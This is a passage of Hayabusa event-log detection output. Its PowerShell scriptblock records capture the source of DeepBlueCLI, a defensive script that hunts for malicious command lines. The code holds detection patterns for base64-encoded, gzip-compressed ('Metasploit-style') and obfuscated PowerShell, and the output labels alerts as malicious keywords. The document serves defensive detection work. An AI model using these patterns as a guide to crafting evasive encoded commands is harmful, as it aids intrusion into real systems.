}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.018 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.019 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.019 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.910 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.979 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
